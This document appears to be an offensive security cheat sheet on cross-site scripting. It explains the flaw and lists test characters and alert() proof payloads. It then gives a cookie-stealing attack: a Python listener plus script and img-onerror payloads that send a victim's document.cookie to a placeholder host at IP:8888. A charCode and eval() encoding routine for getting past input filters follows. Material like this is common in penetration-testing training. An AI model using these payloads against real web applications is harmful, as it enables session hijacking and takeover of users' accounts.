Cross Site Scripting

What is Cross Site Scripting (XSS)

Application instead of encoding the input data, treats the input data provided by the user as HTML / JavaScript code which leads to possibility of injecting malicious scripts to the website.

In this way attacker can deliver the script to the victim which when executed can perform any action as targeted user (e.g. steal his session cookie).

Video explaination

How to find it

The most frequently used character to test for XSS injection:

HTML

< > " '

JavaScript

' " { } ;

Default payload

<script>alert(document.domain)</script>

Img payload

<img src onerror=alert(document.domain)>

XSS Cookie Stealer

As mentioned in the previous chapter attacker is able to steal victim's session cookie with Cross Site Scripting (if cookie is not protected with Http Only flag). Below there can be found step by step process how attacker can perform this attack.

Attacker side

python3 -m http.server 8888

<script>window.location.replace("http://IP:8888/a"+document.cookie);</script>

<img src onerror=window.location.replace("http://IP:8888/a"+document.cookie);>

Payload encoding

Sometimes as attackers we have to bypass the input filters which forces us to compress the JavaScript code with JSCompress.

https://jscompress.com

Convert it into CharCode using the following JavaScript code:

function encode_to_javascript(string) {
            var input = string
            var output = '';
            for(pos = 0; pos < input.length; pos++) {
                output += input.charCodeAt(pos);
                if(pos != (input.length - 1)) {
                    output += ",";
                }
            }
            return output;
        }
        
let encoded = encode_to_javascript('insert_minified_javascript')
console.log(encoded)

Execute the encoded payload:

<script>eval(String.fromCharCode(<OUTPUT_FROM_ENCODING>))</script>